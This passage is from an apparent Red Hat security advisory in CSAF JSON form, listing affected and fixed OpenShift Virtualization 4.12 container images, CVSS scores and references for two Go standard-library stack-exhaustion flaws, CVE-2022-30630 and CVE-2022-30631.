"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2107371" } ], "notes": [ { "category": "description", "text": "A flaw was found in the golang standard library, io/fs. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This could allow an attacker to impact availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: io/fs: stack exhaustion in Glob", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-30630" }, { "category": "external", "summary": "RHBZ#2107371", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-30630", "url": "https://www.cve.org/CVERecord?id=CVE-2022-30630" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-30630", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30630" }, { "category": "external", "summary": "https://go.dev/issue/53415", "url": "https://go.dev/issue/53415" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", "url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE" } ], "release_date": "2022-07-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: io/fs: stack exhaustion in Glob" }, { "cve": "CVE-2022-30631", "cwe": { "id": "CWE-1325", "name": "Improperly Controlled Sequential Memory Allocation" }, "discovery_date": "2022-07-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2107342" } ], "notes": [ { "category": "description", "text": "A flaw was found in golang. Calling the Reader, Read method on an archive that contains a large number of concatenated 0-length compressed files can cause a panic issue due to stack exhaustion.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: compress/gzip: stack exhaustion in Reader.Read", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-30631" }, { "category": "external", "summary": "RHBZ#2107342", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107342" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-30631", "url": "https://www.cve.org/CVERecord?id=CVE-2022-30631" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-30631", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30631" }, { "category": "external", "summary": "https://go.dev/issue/53168", "url": "https://go.dev/issue/53168" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", "url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE" } ], "release_date": "2022-07-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, 